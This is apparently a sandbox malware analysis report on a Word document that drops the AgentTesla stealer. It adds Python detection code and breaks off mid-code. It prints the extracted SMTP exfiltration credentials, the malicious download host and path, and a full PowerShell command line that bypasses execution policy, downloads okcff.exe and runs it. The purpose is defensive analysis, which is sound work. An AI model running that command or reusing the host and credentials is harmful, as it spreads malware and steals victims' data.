Windows Analysis Report 478644.doc

Overview

General Information

Sample Name: 478644.doc
Analysis ID: 553100
MD5: c0f8f2fc481e9be7141d84b401edf1f7
SHA1: ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256: 4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

AV Detection:

Found malware configuration
Source: 41.0.okcff.exe.400000.5.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}
Multi AV Scanner detection for submitted file
Source: 478644.doc Virustotal: Detection: 41%
Source: 478644.doc ReversingLabs: Detection: 30%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\okcff.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 41.0.okcff.exe.400000.5.unpack Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.7.unpack Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.9.unpack Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.13.unpack Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.11.unpack Avira: Label: TR/Spy.Gen8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: okcff[1].exe.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mitmar-pl.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_021AC348
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_021AC43D
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 9_2_021AC915
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 9_2_021AC920
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
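
The process-start findings above (WINWORD.EXE starting powershell.exe) together with the Sigma titles in the signature list (Office product spawning a shell, PowerShell DownloadFile / Download from URL, execution policy changed to an unsecure level, very long command line) describe one detection chain. The block below is an added example, not part of the Joe Sandbox report and not Joe Sandbox or Sigma code: it replays those checks in Python over constructed Sysmon-style process-creation events. Only the parent and child image paths, the download URL and the okcff.exe drop path are taken from the report; the report does not reproduce the PowerShell command line, so the command text and flags in the first sample event are an assumption, as is the 1024-character threshold used for "very long".

```python
import re

# Office processes and the script/shell hosts they should not normally spawn.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

DOWNLOAD_API = re.compile(r"downloadfile|downloadstring|downloaddata|invoke-webrequest|"
                          r"\biwr\b|invoke-restmethod|start-bitstransfer|net\.webclient", re.I)
URL_IN_CMD = re.compile(r"https?://", re.I)
EP_BYPASS = re.compile(r"-(?:ep|ex|exe|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
LONG_CMDLINE = 1024  # assumed threshold; the report only says "very long"


def image_name(path):
    """Lower-cased file name of an image path (handles both separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the checks one process-creation event trips."""
    parent = image_name(event.get("ParentImage", ""))
    image = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and image in SHELL_HOSTS:
        hits.append("Microsoft Office Product Spawning Windows Shell")
    if image in POWERSHELL:
        if DOWNLOAD_API.search(cmd):
            hits.append("PowerShell DownloadFile")
        if URL_IN_CMD.search(cmd):
            hits.append("PowerShell Download from URL")
        if EP_BYPASS.search(cmd):
            hits.append("Change PowerShell Policies to a Unsecure Level")
    if DOWNLOAD_API.search(cmd) and URL_IN_CMD.search(cmd):
        hits.append("Windows Suspicious Use Of Web Request in CommandLine")
    if len(cmd) > LONG_CMDLINE:
        hits.append("Very long cmdline option found")
    return hits


def triage(events):
    """Map event index -> hits for every event that tripped at least one check."""
    result = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            result[i] = hits
    return result


# Constructed sample events (Sysmon Event ID 1 field names).
EVENTS = [
    {   # The chain the report shows: WINWORD.EXE -> powershell.exe. URL and drop path are from
        # the report; the command text and flags are assumed, the report does not print them.
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                        "\"(New-Object Net.WebClient).DownloadFile('http://mitmar-pl.com/okcff.exe',"
                        "'C:\\Users\\user\\AppData\\Roaming\\okcff.exe');"
                        "Start-Process 'C:\\Users\\user\\AppData\\Roaming\\okcff.exe'\""),
    },
    {   # Benign control: PowerShell started from Explorer to list a folder.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command \"Get-ChildItem C:\\Users\\user\\Documents\"",
    },
]

if __name__ == "__main__":
    for index, hits in triage(EVENTS).items():
        print(index, hits)
```

In a real pipeline the event dictionaries come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled; without command-line logging the download and execution-policy checks have nothing to match, which is why the parent/child pairing is the one check here that does not depend on it.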

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WKD-ASIE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.0.9.166
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: three responses to GET /okcff.exe (Date: Fri, 14 Jan 2022 09:23:18 GMT, 09:23:22 GMT and 09:23:23 GMT) whose remaining headers and body are identical:
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp String found in binary or memory: httP://mitmar-pl.com/ok
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp String found in binary or memory: httP://mitmar-pl.com/okcff.ex
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp String found in binary or memory: httP://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp String found in binary or memory: httP://mitmar-pl.com/okcff.exePE
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp String found in binary or memory: http://mitmar-pl.com
Source: okcff.exe String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmp String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmp String found in binary or memory: http://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/cclean
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: okcff.exe String found in binary or memory: https://google.com
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp String found in binary or memory: https://google.com/
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp String found in binary or memory: https://google.comD
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
Source: unknown DNS traffic detected: queries for: mitmar-pl.com
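
The exchanges in this section show three GETs for /okcff.exe (one carrying the IE-style User-Agent that urlmon sends, two with no User-Agent at all), a GET for /Crkrqdrd.jpeg, and 200 responses with Content-Type application/x-msdownload whose body opens with an MZ header. The block below is an added example, not code from the report: it parses constructed copies of those messages and applies the checks an analyst would run on them: missing User-Agent, executable-looking request path, MZ/PE sniffing independent of Content-Type (the report does not show what /Crkrqdrd.jpeg returned, and a name-based filter would miss a PE served under an image extension), the PE link timestamp compared with the server's Date header (the report flags the timestamp as suspicious; the COFF header in the dump reads 0xf603599a), and the nginx ETag, which is the served file's mtime and size in hex, compared with Last-Modified and Content-Length. The messages are rebuilt with CRLF from the header values printed above; the body is a stub that reproduces only the DOS header and COFF header bytes visible in the dump, not the 194560-byte payload.

```python
import re
import struct
from email.utils import parsedate_to_datetime


def parse_http(raw):
    """Split one HTTP/1.1 message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


EXEC_PATH = re.compile(r"\.(?:exe|dll|scr|ps1|sct|hta|vbs|js|jar)(?:\?|$)", re.I)


def triage_request(raw):
    start, headers, _ = parse_http(raw)
    _, path, _ = start.split(" ", 2)
    out = []
    if "user-agent" not in headers:
        out.append("HTTP GET or POST without a user agent")
    if EXEC_PATH.search(path):
        out.append("request for an executable-looking path")
    return out


def pe_info(body):
    """(machine, section count, link timestamp) if body starts a PE image, else None."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if len(body) < e_lfanew + 12 or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<HHI", body, e_lfanew + 4)


def nginx_etag(etag):
    """nginx emits ETag as '<mtime hex>-<size hex>'; return (mtime, size) or None."""
    m = re.fullmatch(r'"?([0-9a-f]+)-([0-9a-f]+)"?', etag)
    return (int(m.group(1), 16), int(m.group(2), 16)) if m else None


def triage_response(raw):
    _, headers, body = parse_http(raw)
    out = []
    if headers.get("content-type", "").lower().startswith("application/x-msdownload"):
        out.append("Content-Type advertises a Windows executable")
    info = pe_info(body)
    if info:
        machine, nsections, ts = info
        out.append("body is a PE image (machine 0x%04x, %d sections)" % (machine, nsections))
        if "date" in headers and ts > parsedate_to_datetime(headers["date"]).timestamp():
            out.append("PE link timestamp is later than the server Date header")
    tag = nginx_etag(headers.get("etag", ""))
    if tag and "last-modified" in headers and "content-length" in headers:
        mtime, size = tag
        ok = (mtime == int(parsedate_to_datetime(headers["last-modified"]).timestamp())
              and size == int(headers["content-length"]))
        out.append("ETag %s Last-Modified/Content-Length" % ("matches" if ok else "contradicts"))
    return out


# Constructed from the request lines printed in the report (joined here with CRLF).
REQ_WITH_UA = (b"GET /okcff.exe HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
               b"Accept-Encoding: gzip, deflate\r\n"
               b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0)\r\n"
               b"Host: mitmar-pl.com\r\nConnection: Keep-Alive\r\n\r\n")
REQ_NO_UA = b"GET /okcff.exe HTTP/1.1\r\nHost: mitmar-pl.com\r\nConnection: Keep-Alive\r\n\r\n"
REQ_JPEG = b"GET /Crkrqdrd.jpeg HTTP/1.1\r\nHost: mitmar-pl.com\r\nConnection: Keep-Alive\r\n\r\n"

# Body stub: DOS header (e_lfanew = 0x80), DOS stub and PE signature + COFF header with the
# values the report's "Data Raw" dump shows (machine 0x14c, 3 sections, timestamp 0xf603599a).
PE_STUB = (bytes.fromhex("4d5a90000300000004000000ffff0000b8000000000000004000000000000000")
           + bytes(28) + struct.pack("<I", 0x80)
           + bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")
           + b"This program cannot be run in DOS mode.\r\r\n$")
PE_STUB = PE_STUB.ljust(0x80, b"\0") + b"PE\0\0" + struct.pack(
    "<HHIIIHH", 0x014C, 3, 0xF603599A, 0, 0, 0xE0, 0x010E)

RESP = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Fri, 14 Jan 2022 09:23:18 GMT\r\n"
        b"Content-Type: application/x-msdownload\r\nContent-Length: 194560\r\n"
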